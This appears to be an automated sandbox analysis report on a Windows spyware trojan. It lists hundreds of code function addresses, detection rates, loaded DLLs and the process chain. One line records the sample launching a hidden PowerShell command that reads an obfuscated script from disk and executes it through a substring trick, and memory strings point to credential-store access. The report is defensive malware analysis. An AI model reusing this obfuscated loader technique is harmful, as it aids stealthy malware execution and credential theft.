          Source: C:\Users\user\AppData\Local\Temp\Nonalined.exeCode function: 11_2_234180C811_2_234180C8
          Source: C:\Users\user\AppData\Local\Temp\Nonalined.exeCode function: 11_2_234172CA11_2_234172CA
          Source: C:\Users\user\AppData\Local\Temp\Nonalined.exeCode function: 11_2_2341C0D011_2_2341C0D0
          Source: C:\Users\user\AppData\Local\Temp\Nonalined.exeCode function: 11_2_2341A0D011_2_2341A0D0
          Source: C:\Users\user\AppData\Local\Temp\Nonalined.exeCode function: 11_2_2341A0E011_2_2341A0E0
          Source: C:\Users\user\AppData\Local\Temp\Nonalined.exeCode function: 11_2_234108F011_2_234108F0
          Source: C:\Users\user\AppData\Local\Temp\Nonalined.exeCode function: 11_2_234122F011_2_234122F0
          Source: C:\Users\user\AppData\Local\Temp\Nonalined.exeCode function: 11_2_2341F2F011_2_2341F2F0
          Source: C:\Users\user\AppData\Local\Temp\Nonalined.exeCode function: 11_2_2341CE8011_2_2341CE80
          Source: C:\Users\user\AppData\Local\Temp\Nonalined.exeCode function: 11_2_2341648811_2_23416488
          Source: C:\Users\user\AppData\Local\Temp\Nonalined.exeCode function: 11_2_2341AE9011_2_2341AE90
          Source: C:\Users\user\AppData\Local\Temp\Nonalined.exeCode function: 11_2_2341049811_2_23410498
          Source: C:\Users\user\AppData\Local\Temp\Nonalined.exeCode function: 11_2_23411E9811_2_23411E98
          Source: C:\Users\user\AppData\Local\Temp\Nonalined.exeCode function: 11_2_23411EA811_2_23411EA8
          Source: C:\Users\user\AppData\Local\Temp\Nonalined.exeCode function: 11_2_2341E0B011_2_2341E0B0
          Source: C:\Users\user\AppData\Local\Temp\Nonalined.exeCode function: 11_2_234138B811_2_234138B8
          Source: C:\Users\user\AppData\Local\Temp\Nonalined.exeCode function: 11_2_2348447811_2_23484478
          Source: C:\Users\user\AppData\Local\Temp\Nonalined.exeCode function: 11_2_2348981811_2_23489818
          Source: C:\Users\user\AppData\Local\Temp\Nonalined.exeCode function: 11_2_2348F2F011_2_2348F2F0
          Source: C:\Users\user\AppData\Local\Temp\Nonalined.exeCode function: 11_2_23484B9811_2_23484B98
          Source: C:\Users\user\AppData\Local\Temp\Nonalined.exeCode function: 11_2_2348124811_2_23481248
          Source: C:\Users\user\AppData\Local\Temp\Nonalined.exeCode function: 11_2_2348684811_2_23486848
          Source: C:\Users\user\AppData\Local\Temp\Nonalined.exeCode function: 11_2_23483B4811_2_23483B48
          Source: C:\Users\user\AppData\Local\Temp\Nonalined.exeCode function: 11_2_2348BE4811_2_2348BE48
          Source: C:\Users\user\AppData\Local\Temp\Nonalined.exeCode function: 11_2_2348004011_2_23480040
          Source: C:\Users\user\AppData\Local\Temp\Nonalined.exeCode function: 11_2_2348D64011_2_2348D640
          Source: C:\Users\user\AppData\Local\Temp\Nonalined.exeCode function: 11_2_2348934111_2_23489341
          Source: C:\Users\user\AppData\Local\Temp\Nonalined.exeCode function: 11_2_23483B5811_2_23483B58
          Source: C:\Users\user\AppData\Local\Temp\Nonalined.exeCode function: 11_2_2348BE5811_2_2348BE58
          Source: C:\Users\user\AppData\Local\Temp\Nonalined.exeCode function: 11_2_23481B5811_2_23481B58
          Source: C:\Users\user\AppData\Local\Temp\Nonalined.exeCode function: 11_2_2348935011_2_23489350
          Source: C:\Users\user\AppData\Local\Temp\Nonalined.exeCode function: 11_2_2348505011_2_23485050
          Source: C:\Users\user\AppData\Local\Temp\Nonalined.exeCode function: 11_2_2348E95111_2_2348E951
          Source: C:\Users\user\AppData\Local\Temp\Nonalined.exeCode function: 11_2_23487B5711_2_23487B57
          Source: C:\Users\user\AppData\Local\Temp\Nonalined.exeCode function: 11_2_23481B6811_2_23481B68
          Source: C:\Users\user\AppData\Local\Temp\Nonalined.exeCode function: 11_2_23487B6811_2_23487B68
          Source: C:\Users\user\AppData\Local\Temp\Nonalined.exeCode function: 11_2_2348D16811_2_2348D168
          Source: C:\Users\user\AppData\Local\Temp\Nonalined.exeCode function: 11_2_2348636F11_2_2348636F
          Source: C:\Users\user\AppData\Local\Temp\Nonalined.exeCode function: 11_2_2348506011_2_23485060
          Source: C:\Users\user\AppData\Local\Temp\Nonalined.exeCode function: 11_2_2348E96011_2_2348E960
          Source: C:\Users\user\AppData\Local\Temp\Nonalined.exeCode function: 11_2_2348A66011_2_2348A660
          Source: C:\Users\user\AppData\Local\Temp\Nonalined.exeCode function: 11_2_2348446711_2_23484467
          Source: C:\Users\user\AppData\Local\Temp\Nonalined.exeCode function: 11_2_2348D17811_2_2348D178
          Source: C:\Users\user\AppData\Local\Temp\Nonalined.exeCode function: 11_2_23488E7811_2_23488E78
          Source: C:\Users\user\AppData\Local\Temp\Nonalined.exeCode function: 11_2_2348247F11_2_2348247F
          Source: C:\Users\user\AppData\Local\Temp\Nonalined.exeCode function: 11_2_2348A67011_2_2348A670
          Source: C:\Users\user\AppData\Local\Temp\Nonalined.exeCode function: 11_2_2348DB0811_2_2348DB08
          Source: C:\Users\user\AppData\Local\Temp\Nonalined.exeCode function: 11_2_2348980A11_2_2348980A
          Source: C:\Users\user\AppData\Local\Temp\Nonalined.exeCode function: 11_2_2348B00011_2_2348B000
          Source: C:\Users\user\AppData\Local\Temp\Nonalined.exeCode function: 11_2_23486D0011_2_23486D00
          Source: C:\Users\user\AppData\Local\Temp\Nonalined.exeCode function: 11_2_2348291811_2_23482918
          Source: C:\Users\user\AppData\Local\Temp\Nonalined.exeCode function: 11_2_2348091811_2_23480918
          Source: C:\Users\user\AppData\Local\Temp\Nonalined.exeCode function: 11_2_2348551911_2_23485519
          Source: C:\Users\user\AppData\Local\Temp\Nonalined.exeCode function: 11_2_23486D1011_2_23486D10
          Source: C:\Users\user\AppData\Local\Temp\Nonalined.exeCode function: 11_2_2348C31011_2_2348C310
          Source: C:\Users\user\AppData\Local\Temp\Nonalined.exeCode function: 11_2_2348001211_2_23480012
          Source: C:\Users\user\AppData\Local\Temp\Nonalined.exeCode function: 11_2_2348EE1711_2_2348EE17
          Source: C:\Users\user\AppData\Local\Temp\Nonalined.exeCode function: 11_2_2348092811_2_23480928
          Source: C:\Users\user\AppData\Local\Temp\Nonalined.exeCode function: 11_2_2348552811_2_23485528
          Source: C:\Users\user\AppData\Local\Temp\Nonalined.exeCode function: 11_2_2348EE2811_2_2348EE28
          Source: C:\Users\user\AppData\Local\Temp\Nonalined.exeCode function: 11_2_2348AB2811_2_2348AB28
          Source: C:\Users\user\AppData\Local\Temp\Nonalined.exeCode function: 11_2_2348322A11_2_2348322A
          Source: C:\Users\user\AppData\Local\Temp\Nonalined.exeCode function: 11_2_2348D62F11_2_2348D62F
          Source: C:\Users\user\AppData\Local\Temp\Nonalined.exeCode function: 11_2_2348C32011_2_2348C320
          Source: C:\Users\user\AppData\Local\Temp\Nonalined.exeCode function: 11_2_2348802011_2_23488020
          Source: C:\Users\user\AppData\Local\Temp\Nonalined.exeCode function: 11_2_2348323811_2_23483238
          Source: C:\Users\user\AppData\Local\Temp\Nonalined.exeCode function: 11_2_2348AB3811_2_2348AB38
          Source: C:\Users\user\AppData\Local\Temp\Nonalined.exeCode function: 11_2_2348683811_2_23486838
          Source: C:\Users\user\AppData\Local\Temp\Nonalined.exeCode function: 11_2_2348803011_2_23488030
          Source: C:\Users\user\AppData\Local\Temp\Nonalined.exeCode function: 11_2_2348123711_2_23481237
          Source: C:\Users\user\AppData\Local\Temp\Nonalined.exeCode function: 11_2_234836C811_2_234836C8
          Source: C:\Users\user\AppData\Local\Temp\Nonalined.exeCode function: 11_2_2348B4C811_2_2348B4C8
          Source: C:\Users\user\AppData\Local\Temp\Nonalined.exeCode function: 11_2_234871C811_2_234871C8
          Source: C:\Users\user\AppData\Local\Temp\Nonalined.exeCode function: 11_2_234816CA11_2_234816CA
          Source: C:\Users\user\AppData\Local\Temp\Nonalined.exeCode function: 11_2_234889C011_2_234889C0
          Source: C:\Users\user\AppData\Local\Temp\Nonalined.exeCode function: 11_2_234816D811_2_234816D8
          Source: C:\Users\user\AppData\Local\Temp\Nonalined.exeCode function: 11_2_234871D811_2_234871D8
          Source: C:\Users\user\AppData\Local\Temp\Nonalined.exeCode function: 11_2_23483FD811_2_23483FD8
          Source: C:\Users\user\AppData\Local\Temp\Nonalined.exeCode function: 11_2_234859DF11_2_234859DF
          Source: C:\Users\user\AppData\Local\Temp\Nonalined.exeCode function: 11_2_2348DFD011_2_2348DFD0
          Source: C:\Users\user\AppData\Local\Temp\Nonalined.exeCode function: 11_2_23489CD711_2_23489CD7
          Source: C:\Users\user\AppData\Local\Temp\Nonalined.exeCode function: 11_2_23483FE811_2_23483FE8
          Source: C:\Users\user\AppData\Local\Temp\Nonalined.exeCode function: 11_2_2348C7E811_2_2348C7E8
          Source: C:\Users\user\AppData\Local\Temp\Nonalined.exeCode function: 11_2_23481FE811_2_23481FE8
          Source: C:\Users\user\AppData\Local\Temp\Nonalined.exeCode function: 11_2_23489CE011_2_23489CE0
          Source: C:\Users\user\AppData\Local\Temp\Nonalined.exeCode function: 11_2_2348C7E011_2_2348C7E0
          Source: C:\Users\user\AppData\Local\Temp\Nonalined.exeCode function: 11_2_2348F2E011_2_2348F2E0
          Source: C:\Users\user\AppData\Local\Temp\Nonalined.exeCode function: 11_2_234884E711_2_234884E7
          Source: C:\Users\user\AppData\Local\Temp\Nonalined.exeCode function: 11_2_23481FF811_2_23481FF8
          Source: C:\Users\user\AppData\Local\Temp\Nonalined.exeCode function: 11_2_234884F811_2_234884F8
          Source: C:\Users\user\AppData\Local\Temp\Nonalined.exeCode function: 11_2_2348DAF811_2_2348DAF8
          Source: C:\Users\user\AppData\Local\Temp\Nonalined.exeCode function: 11_2_234859F011_2_234859F0
          Source: C:\Users\user\AppData\Local\Temp\Nonalined.exeCode function: 11_2_2348AFF211_2_2348AFF2
          Source: C:\Users\user\AppData\Local\Temp\Nonalined.exeCode function: 11_2_2348248811_2_23482488
          Source: C:\Users\user\AppData\Local\Temp\Nonalined.exeCode function: 11_2_23488E8811_2_23488E88
          Source: C:\Users\user\AppData\Local\Temp\Nonalined.exeCode function: 11_2_23484B8811_2_23484B88
          Source: C:\Users\user\AppData\Local\Temp\Nonalined.exeCode function: 11_2_2348048911_2_23480489
          Source: C:\Users\user\AppData\Local\Temp\Nonalined.exeCode function: 11_2_2348E48A11_2_2348E48A
          Source: C:\Users\user\AppData\Local\Temp\Nonalined.exeCode function: 11_2_2348638011_2_23486380
          Source: C:\Users\user\AppData\Local\Temp\Nonalined.exeCode function: 11_2_2348FC8011_2_2348FC80
          Source: C:\Users\user\AppData\Local\Temp\Nonalined.exeCode function: 11_2_2348B98011_2_2348B980
          Source: C:\Users\user\AppData\Local\Temp\Nonalined.exeCode function: 11_2_2348049811_2_23480498
          Source: C:\Users\user\AppData\Local\Temp\Nonalined.exeCode function: 11_2_2348E49811_2_2348E498
          Source: C:\Users\user\AppData\Local\Temp\Nonalined.exeCode function: 11_2_23482D9A11_2_23482D9A
          Source: C:\Users\user\AppData\Local\Temp\Nonalined.exeCode function: 11_2_2348A19A11_2_2348A19A
          Source: C:\Users\user\AppData\Local\Temp\Nonalined.exeCode function: 11_2_2348B99011_2_2348B990
          Source: C:\Users\user\AppData\Local\Temp\Nonalined.exeCode function: 11_2_2348769111_2_23487691
          Source: C:\Users\user\AppData\Local\Temp\Nonalined.exeCode function: 11_2_23482DA811_2_23482DA8
          Source: C:\Users\user\AppData\Local\Temp\Nonalined.exeCode function: 11_2_2348A1A811_2_2348A1A8
          Source: C:\Users\user\AppData\Local\Temp\Nonalined.exeCode function: 11_2_23485EA811_2_23485EA8
          Source: C:\Users\user\AppData\Local\Temp\Nonalined.exeCode function: 11_2_23480DA911_2_23480DA9
          Source: C:\Users\user\AppData\Local\Temp\Nonalined.exeCode function: 11_2_234876A011_2_234876A0
          Source: C:\Users\user\AppData\Local\Temp\Nonalined.exeCode function: 11_2_2348CCA011_2_2348CCA0
          Source: C:\Users\user\AppData\Local\Temp\Nonalined.exeCode function: 11_2_2348F7A711_2_2348F7A7
          Source: C:\Users\user\AppData\Local\Temp\Nonalined.exeCode function: 11_2_23480DB811_2_23480DB8
          Source: C:\Users\user\AppData\Local\Temp\Nonalined.exeCode function: 11_2_23485EB811_2_23485EB8
          Source: C:\Users\user\AppData\Local\Temp\Nonalined.exeCode function: 11_2_2348F7B811_2_2348F7B8
          Source: C:\Users\user\AppData\Local\Temp\Nonalined.exeCode function: 11_2_234836BA11_2_234836BA
          Source: C:\Users\user\AppData\Local\Temp\Nonalined.exeCode function: 11_2_2348DFBF11_2_2348DFBF
          Source: C:\Users\user\AppData\Local\Temp\Nonalined.exeCode function: 11_2_2348CCB011_2_2348CCB0
          Source: C:\Users\user\AppData\Local\Temp\Nonalined.exeCode function: 11_2_234889B111_2_234889B1
          Source: C:\Users\user\AppData\Local\Temp\Nonalined.exeCode function: 11_2_2348B4B711_2_2348B4B7
          Source: C:\Users\user\AppData\Local\Temp\Nonalined.exeCode function: 11_2_234A57C011_2_234A57C0
          Source: C:\Users\user\AppData\Local\Temp\Nonalined.exeCode function: 11_2_234AF5A011_2_234AF5A0
          Source: C:\Users\user\AppData\Local\Temp\Nonalined.exeCode function: 11_2_234ABE1011_2_234ABE10
          Source: C:\Users\user\AppData\Local\Temp\Nonalined.exeCode function: 11_2_234A4B4011_2_234A4B40
          Source: C:\Users\user\AppData\Local\Temp\Nonalined.exeCode function: 11_2_234A194011_2_234A1940
          Source: C:\Users\user\AppData\Local\Temp\Nonalined.exeCode function: 11_2_234A356011_2_234A3560
          Source: C:\Users\user\AppData\Local\Temp\Nonalined.exeCode function: 11_2_234A036011_2_234A0360
          Source: C:\Users\user\AppData\Local\Temp\Nonalined.exeCode function: 11_2_234A450011_2_234A4500
          Source: C:\Users\user\AppData\Local\Temp\Nonalined.exeCode function: 11_2_234A130011_2_234A1300
          Source: C:\Users\user\AppData\Local\Temp\Nonalined.exeCode function: 11_2_234A2F2011_2_234A2F20
          Source: C:\Users\user\AppData\Local\Temp\Nonalined.exeCode function: 11_2_234AD53811_2_234AD538
          Source: C:\Users\user\AppData\Local\Temp\Nonalined.exeCode function: 11_2_234AF1CB11_2_234AF1CB
          Source: C:\Users\user\AppData\Local\Temp\Nonalined.exeCode function: 11_2_234A25C011_2_234A25C0
          Source: C:\Users\user\AppData\Local\Temp\Nonalined.exeCode function: 11_2_234AF1C711_2_234AF1C7
          Source: C:\Users\user\AppData\Local\Temp\Nonalined.exeCode function: 11_2_234A41E011_2_234A41E0
          Source: C:\Users\user\AppData\Local\Temp\Nonalined.exeCode function: 11_2_234A0FE011_2_234A0FE0
          Source: C:\Users\user\AppData\Local\Temp\Nonalined.exeCode function: 11_2_234A8FF811_2_234A8FF8
          Source: C:\Users\user\AppData\Local\Temp\Nonalined.exeCode function: 11_2_234AE78A11_2_234AE78A
          Source: C:\Users\user\AppData\Local\Temp\Nonalined.exeCode function: 11_2_234A1F8011_2_234A1F80
          Source: C:\Users\user\AppData\Local\Temp\Nonalined.exeCode function: 11_2_234A518011_2_234A5180
          Source: C:\Users\user\AppData\Local\Temp\Nonalined.exeCode function: 11_2_234AE79811_2_234AE798
          Source: C:\Users\user\AppData\Local\Temp\Nonalined.exeCode function: 11_2_234AF59211_2_234AF592
          Source: C:\Users\user\AppData\Local\Temp\Nonalined.exeCode function: 11_2_234A3BA011_2_234A3BA0
          Source: C:\Users\user\AppData\Local\Temp\Nonalined.exeCode function: 11_2_234A09A011_2_234A09A0
          Source: C:\Users\user\AppData\Local\Temp\Nonalined.exeCode function: 11_2_234AF1BF11_2_234AF1BF
          Source: C:\Users\user\AppData\Local\Temp\Nonalined.exeCode function: 11_2_234AF1BD11_2_234AF1BD
          Source: C:\Users\user\AppData\Local\Temp\Nonalined.exeCode function: 11_2_234A324011_2_234A3240
          Source: C:\Users\user\AppData\Local\Temp\Nonalined.exeCode function: 11_2_234A004011_2_234A0040
          Source: C:\Users\user\AppData\Local\Temp\Nonalined.exeCode function: 11_2_234A4E6011_2_234A4E60
          Source: C:\Users\user\AppData\Local\Temp\Nonalined.exeCode function: 11_2_234A1C6011_2_234A1C60
          Source: C:\Users\user\AppData\Local\Temp\Nonalined.exeCode function: 11_2_234A2C0011_2_234A2C00
          Source: C:\Users\user\AppData\Local\Temp\Nonalined.exeCode function: 11_2_234AF22811_2_234AF228
          Source: C:\Users\user\AppData\Local\Temp\Nonalined.exeCode function: 11_2_234A482011_2_234A4820
          Source: C:\Users\user\AppData\Local\Temp\Nonalined.exeCode function: 11_2_234A162011_2_234A1620
          Source: C:\Users\user\AppData\Local\Temp\Nonalined.exeCode function: 11_2_234A3EC011_2_234A3EC0
          Source: C:\Users\user\AppData\Local\Temp\Nonalined.exeCode function: 11_2_234A0CC011_2_234A0CC0
          Source: C:\Users\user\AppData\Local\Temp\Nonalined.exeCode function: 11_2_234A28E011_2_234A28E0
          Source: C:\Users\user\AppData\Local\Temp\Nonalined.exeCode function: 11_2_234A388011_2_234A3880
          Source: C:\Users\user\AppData\Local\Temp\Nonalined.exeCode function: 11_2_234A068011_2_234A0680
          Source: C:\Users\user\AppData\Local\Temp\Nonalined.exeCode function: 11_2_234A928111_2_234A9281
          Source: C:\Users\user\AppData\Local\Temp\Nonalined.exeCode function: 11_2_234A0CAF11_2_234A0CAF
          Source: C:\Users\user\AppData\Local\Temp\Nonalined.exeCode function: 11_2_234A54A011_2_234A54A0
          Source: C:\Users\user\AppData\Local\Temp\Nonalined.exeCode function: 11_2_234A22A011_2_234A22A0
          Source: C:\Users\user\AppData\Local\Temp\Nonalined.exeCode function: 11_2_234BE34811_2_234BE348
          Source: C:\Users\user\AppData\Local\Temp\Nonalined.exeCode function: 11_2_234B050811_2_234B0508
          Source: C:\Users\user\AppData\Local\Temp\Nonalined.exeCode function: 11_2_234BE66811_2_234BE668
          Source: C:\Users\user\AppData\Local\Temp\Nonalined.exeCode function: 11_2_234B6C8811_2_234B6C88
          Source: C:\Users\user\AppData\Local\Temp\Nonalined.exeCode function: 11_2_234B7F4811_2_234B7F48
          Source: C:\Users\user\AppData\Local\Temp\Nonalined.exeCode function: 11_2_234BB14811_2_234BB148
          Source: C:\Users\user\AppData\Local\Temp\Nonalined.exeCode function: 11_2_234BCD6811_2_234BCD68
          Source: C:\Users\user\AppData\Local\Temp\Nonalined.exeCode function: 11_2_234B9B6811_2_234B9B68
          Source: C:\Users\user\AppData\Local\Temp\Nonalined.exeCode function: 11_2_234BDD0811_2_234BDD08
          Source: C:\Users\user\AppData\Local\Temp\Nonalined.exeCode function: 11_2_234B790811_2_234B7908
          Source: C:\Users\user\AppData\Local\Temp\Nonalined.exeCode function: 11_2_234BAB0811_2_234BAB08
          Source: C:\Users\user\AppData\Local\Temp\Nonalined.exeCode function: 11_2_234BF92811_2_234BF928
          Source: C:\Users\user\AppData\Local\Temp\Nonalined.exeCode function: 11_2_234BC72811_2_234BC728
          Source: C:\Users\user\AppData\Local\Temp\Nonalined.exeCode function: 11_2_234B952811_2_234B9528
          Source: C:\Users\user\AppData\Local\Temp\Nonalined.exeCode function: 11_2_234BEFC811_2_234BEFC8
          Source: C:\Users\user\AppData\Local\Temp\Nonalined.exeCode function: 11_2_234B8BC811_2_234B8BC8
          Source: C:\Users\user\AppData\Local\Temp\Nonalined.exeCode function: 11_2_234BBDC811_2_234BBDC8
          Source: C:\Users\user\AppData\Local\Temp\Nonalined.exeCode function: 11_2_234BD9E811_2_234BD9E8
          Source: C:\Users\user\AppData\Local\Temp\Nonalined.exeCode function: 11_2_234B75E811_2_234B75E8
          Source: C:\Users\user\AppData\Local\Temp\Nonalined.exeCode function: 11_2_234BA7E811_2_234BA7E8
          Source: C:\Users\user\AppData\Local\Temp\Nonalined.exeCode function: 11_2_234BE98811_2_234BE988
          Source: C:\Users\user\AppData\Local\Temp\Nonalined.exeCode function: 11_2_234BB78811_2_234BB788
          Source: C:\Users\user\AppData\Local\Temp\Nonalined.exeCode function: 11_2_234B858811_2_234B8588
          Source: C:\Users\user\AppData\Local\Temp\Nonalined.exeCode function: 11_2_234BD3A811_2_234BD3A8
          Source: C:\Users\user\AppData\Local\Temp\Nonalined.exeCode function: 11_2_234B6FA811_2_234B6FA8
          Source: C:\Users\user\AppData\Local\Temp\Nonalined.exeCode function: 11_2_234BA1A811_2_234BA1A8
          Source: C:\Users\user\AppData\Local\Temp\Nonalined.exeCode function: 11_2_234BFC4811_2_234BFC48
          Source: C:\Users\user\AppData\Local\Temp\Nonalined.exeCode function: 11_2_234BCA4811_2_234BCA48
          Source: C:\Users\user\AppData\Local\Temp\Nonalined.exe | Code functions: 11_2_234B9848, 11_2_234B0040, 11_2_234B8268, 11_2_234BB468, 11_2_234BF608, 11_2_234BC408, 11_2_234B9208, 11_2_234BAE1A, 11_2_234B0012, 11_2_234BE028, 11_2_234B7C28, 11_2_234BAE28, 11_2_234BFC37, 11_2_234BD6C8, 11_2_234B72C8, 11_2_234BA4C8, 11_2_234BF2E8, 11_2_234BC0E8, 11_2_234B8EE8, 11_2_234B04F7, 11_2_234BD088, 11_2_234B9E88, 11_2_234B8898, 11_2_234BEC98, 11_2_234BECA8, 11_2_234B88A8, 11_2_234BBAA8, 11_2_234E2300, 11_2_234E0040, 11_2_234E0760, 11_2_234EE968, 11_2_234E0E48, 11_2_234E1530, 11_2_234E1C18, 11_2_234E22F1, 11_2_234E0012, 11_2_234E0750, 11_2_234E0E38, 11_2_234E1521, 11_2_234E1C08, 11_2_235E2337, 11_2_235E1060, 11_2_235E0448
          Source: Joe Sandbox View | Dropped File: C:\Users\user\AppData\Local\Temp\nsv796.tmp\nsExec.dll 1076CA39C449ED1A968021B76EF31F22A5692DFAFEEA29460E8D970A63C59906
          Source: NDQ211216GM08.exe.bin.exe, 00000000.00000000.998476324.0000000000454000.00000002.00000001.01000000.00000003.sdmp | Binary or memory string: OriginalFilenameisogamies.exeDVarFileInfo$ vs NDQ211216GM08.exe.bin.exe
          Source: NDQ211216GM08.exe.bin.exe | Binary or memory string: OriginalFilenameisogamies.exeDVarFileInfo$ vs NDQ211216GM08.exe.bin.exe
          Source: NDQ211216GM08.exe.bin.exe | Static PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
          Source: classification engine | Classification label: mal100.troj.spyw.evad.winEXE@7/21@5/6
          Source: C:\Users\user\Desktop\NDQ211216GM08.exe.bin.exe | Code function: 0_2_004034F7 EntryPoint,SetErrorMode,GetVersionExW,GetVersionExW,GetVersionExW,lstrlenA,#17,OleInitialize,SHGetFileInfoW,GetCommandLineW,CharNextW,GetTempPathW,GetTempPathW,GetWindowsDirectoryW,lstrcatW,GetTempPathW,lstrcatW,SetEnvironmentVariableW,SetEnvironmentVariableW,SetEnvironmentVariableW,DeleteFileW,lstrcatW,lstrcatW,lstrcatW,lstrcmpiW,SetCurrentDirectoryW,DeleteFileW,CopyFileW,CloseHandle,OleUninitialize,ExitProcess,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,ExitWindowsEx,ExitProcess
          Source: C:\Users\user\AppData\Local\Temp\Nonalined.exe | Code function: 11_2_004034F7 EntryPoint,SetErrorMode,GetVersionExW,GetVersionExW,GetVersionExW,lstrlenA,#17,OleInitialize,SHGetFileInfoW,GetCommandLineW,CharNextW,GetTempPathW,GetTempPathW,GetWindowsDirectoryW,lstrcatW,GetTempPathW,lstrcatW,SetEnvironmentVariableW,SetEnvironmentVariableW,SetEnvironmentVariableW,DeleteFileW,lstrcatW,lstrcatW,lstrcatW,lstrcmpiW,SetCurrentDirectoryW,DeleteFileW,LdrInitializeThunk,CopyFileW,CloseHandle,OleUninitialize,ExitProcess,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,LdrInitializeThunk,ExitWindowsEx,ExitProcess
          Source: C:\Users\user\Desktop\NDQ211216GM08.exe.bin.exe | Code function: 0_2_00404AE1 GetDiskFreeSpaceW,MulDiv
          Source: C:\Users\user\Desktop\NDQ211216GM08.exe.bin.exe | Code function: 0_2_00402210 CoCreateInstance
          Source: C:\Users\user\Desktop\NDQ211216GM08.exe.bin.exe | File created: C:\Users\user\AppData\Local\Skakspillene144
          Source: C:\Users\user\AppData\Local\Temp\Nonalined.exe | Mutant created: NULL
          Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6468:120:WilError_03
          Source: C:\Users\user\Desktop\NDQ211216GM08.exe.bin.exe | File created: C:\Users\user\AppData\Local\Temp\nsd2A3.tmp
          Source: NDQ211216GM08.exe.bin.exe | Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Process
          Source: C:\Users\user\Desktop\NDQ211216GM08.exe.bin.exe | File read: C:\Users\desktop.ini
          Source: C:\Users\user\Desktop\NDQ211216GM08.exe.bin.exe | Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
          Source: Nonalined.exe, 0000000B.00000002.2269171713.00000000204F7000.00000004.00000800.00020000.00000000.sdmp, Nonalined.exe, 0000000B.00000002.2269171713.00000000204A8000.00000004.00000800.00020000.00000000.sdmp, Nonalined.exe, 0000000B.00000002.2269171713.00000000204B8000.00000004.00000800.00020000.00000000.sdmp, Nonalined.exe, 0000000B.00000002.2269171713.00000000204C6000.00000004.00000800.00020000.00000000.sdmp, Nonalined.exe, 0000000B.00000002.2269171713.00000000204EB000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
          Source: NDQ211216GM08.exe.bin.exe | Virustotal: Detection: 63%
          Source: NDQ211216GM08.exe.bin.exe | ReversingLabs: Detection: 63%
          Source: C:\Users\user\Desktop\NDQ211216GM08.exe.bin.exe | File read: C:\Users\user\Desktop\NDQ211216GM08.exe.bin.exe
          Source: unknown | Process created: C:\Users\user\Desktop\NDQ211216GM08.exe.bin.exe "C:\Users\user\Desktop\NDQ211216GM08.exe.bin.exe"
          Source: C:\Users\user\Desktop\NDQ211216GM08.exe.bin.exe | Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "powershell.exe" -windowstyle minimized "$Heksene=gc -Raw 'C:\Users\user\AppData\Local\Skakspillene144\Anarthrously\Braiserings\Irreparabel\Prodomoi.lan';$Bastioned=$Heksene.SubString(52577,3);.$Bastioned($Heksene)"
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
          Source: unknown | Process created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Users\user\AppData\Local\Temp\Nonalined.exe "C:\Users\user\AppData\Local\Temp\Nonalined.exe"
          Source: C:\Users\user\Desktop\NDQ211216GM08.exe.bin.exe | Sections loaded: uxtheme.dll, userenv.dll, apphelp.dll, propsys.dll, dwmapi.dll, cryptbase.dll, oleacc.dll, ntmarta.dll, version.dll, shfolder.dll, kernel.appcore.dll, windows.storage.dll, wldp.dll, riched20.dll, usp10.dll, msls31.dll, textinputframework.dll, coreuicomponents.dll, coremessaging.dll, wintypes.dll, textshaping.dll
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Sections loaded: atl.dll, mscoree.dll, kernel.appcore.dll, version.dll, vcruntime140_clr0400.dll, ucrtbase_clr0400.dll, cryptsp.dll, rsaenh.dll, cryptbase.dll, windows.storage.dll, wldp.dll, amsi.dll, userenv.dll, profapi.dll, msasn1.dll, msisip.dll, wshext.dll, appxsip.dll, opcservices.dll, gpapi.dll, secur32.dll, sspicli.dll, uxtheme.dll, urlmon.dll, iertutil.dll, srvcli.dll, netutils.dll, propsys.dll, wininet.dll, kdscli.dll, ncrypt.dll, ntasn1.dll, microsoft.management.infrastructure.native.unmanaged.dll, mi.dll, miutils.dll, wmidcom.dll, dpapi.dll, wbemcomn.dll, ntmarta.dll, apphelp.dll
          Source: C:\Windows\System32\svchost.exe | Sections loaded: kernel.appcore.dll, qmgr.dll, bitsperf.dll, powrprof.dll, xmllite.dll, firewallapi.dll, esent.dll, umpdc.dll, dnsapi.dll, iphlpapi.dll, fwbase.dll, wldp.dll, ntmarta.dll, profapi.dll, flightsettings.dll, policymanager.dll, msvcp110_win.dll, netprofm.dll, npmproxy.dll, bitsigd.dll, upnp.dll, winhttp.dll, ssdpapi.dll, urlmon.dll, iertutil.dll, srvcli.dll, netutils.dll, appxdeploymentclient.dll, cryptbase.dll, wsmauto.dll, miutils.dll, wsmsvc.dll, dsrole.dll, pcwum.dll, mi.dll, userenv.dll, gpapi.dll, wkscli.dll, sspicli.dll, ondemandconnroutehelper.dll, msv1_0.dll, ntlmshared.dll, cryptdll.dll, webio.dll, mswsock.dll, winnsi.dll, fwpuclnt.dll, rasadhlp.dll, rmclient.dll, usermgrcli.dll, execmodelclient.dll, propsys.dll, coremessaging.dll, twinapi.appcore.dll, onecorecommonproxystub.dll, execmodelproxy.dll, resourcepolicyclient.dll, vssapi.dll, vsstrace.dll, samcli.dll, samlib.dll, 